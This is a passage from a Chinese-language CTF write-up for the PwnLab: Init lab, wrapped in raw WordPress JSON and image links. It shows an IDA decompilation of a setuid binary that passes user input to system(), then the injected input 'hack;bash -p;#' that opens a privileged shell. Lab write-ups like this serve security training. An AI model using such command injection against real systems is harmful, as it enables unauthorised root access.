<\/code><\/pre>\nIDA<\/code>\u53cd\u6c47\u7f16\u7ed3\u679c\u4e3a\uff1a<\/p>\n# main \u51fd\u6570\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n char s; \/\/ [esp+8h] [ebp-70h]\n char *command; \/\/ [esp+6Ch] [ebp-Ch]\n\n printf("Message for root: ");\n fgets(&s, 100, _bss_start);\n asprintf(&command, "\/bin\/echo %s >> \/root\/messages.txt", &s);\n return system(command);\n}<\/code><\/pre>\n\n- \u6253\u5370\u5b57\u7b26\u4e32 (
printf<\/code>)<\/li>\n- \u4ece\u7528\u6237\u5904\u83b7\u53d6\u4e00\u4e2a\u5b57\u7b26\u4e32\u5e76\u5c06\u5176\u5b58\u50a8\u5728\u5806\u6808\u4e2d\u7684
[ebp-0x70]<\/code>( fgets<\/code>)<\/li>\n- \u5c06\u8f93\u5165\u5b57\u7b26\u4e32\u63d2\u5165\u5230\u683c\u5f0f\u5b57\u7b26\u4e32\u4e2d
0x80485c4<\/code>\u5e76\u5c06\u7ed3\u679c\u5b57\u7b26\u4e32\u5b58\u50a8\u5728[ebp-0xc]<\/code>( asprintf<\/code>)<\/li>\n0x80485c4<\/code>\uff1a\/bin\/echo %s >> \/root\/messages.txt<\/code><\/li>\nasprintf<\/code>\u8c03\u7528\u8c03\u7528 system<\/code>\u4ea7\u751f\u7684\u5b57\u7b26\u4e32<\/li>\n<\/ul>\n\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
.\/msg2root\nhack;bash -p;#<\/code><\/pre>\n<\/div><\/p>\n\u83b7\u5f97\u5230\u4e86flag\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
PWNLAB: INIT \u770b\u4e0a\u53bb\u4f3c\u4e4e\u5f88\u53cb\u5584\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff0c\u548c\u4ee5\u524d\u4e00\u6837\uff0c\u91c7\u7528NAT\u6a21\u5f0f\u4f7f\u7528\uff1a \u626b\u4e00\u4e0b\uff1a \u53c8\u662f\u98ce\u5e73\u6d6a […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-376","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/376","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=376"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/376\/revisions"}],"predecessor-version":[{"id":378,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/376\/revisions\/378"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=376"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=376"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=376"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240223103817519\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423729.png\")
<\/div><\/p>\n![\"image-20240223103935358\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423730.png\")
<\/div><\/p>\n![\"image-20240223103951531\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423731.png\")
<\/div><\/p>\n![\"image-20240223103849795\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423732.png\")
<\/div><\/p>\n![\"image-20240223113110678\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423733.png\")
<\/div>![\"image-20240223113137440\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423734.png\")
<\/div><\/p>\n![\"image-20240223114239076\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423735.png\")
<\/div><\/p>\n![\"image-20240223114942953\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423736.png\")
<\/div><\/p>\n![\"image-20240223122459143\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423737.png\")
<\/div><\/p>\n![\"image-20240223115926106\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423738.png\")
<\/div><\/p>\n![\"image-20240223121348651\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423739.png\")
<\/div><\/p>\n![\"image-20240223123800821\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423740.png\")
<\/div><\/p>\n![\"image-20240223123846803\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423741.png\")
<\/div><\/p>\n![\"image-20240223123858299\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423742.png\")
<\/div><\/p>\n![\"image-20240223124904868\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423743.png\")
<\/div><\/p>\n![\"image-20240223130650985\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423744.png\")
<\/div><\/p>\n![\"image-20240223130704174\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423745.png\")
<\/div><\/p>\n![\"image-20240223134350525\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423746.png\")
<\/div><\/p>\n![\"image-20240223142202147\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423747.png\")
<\/div><\/p>\n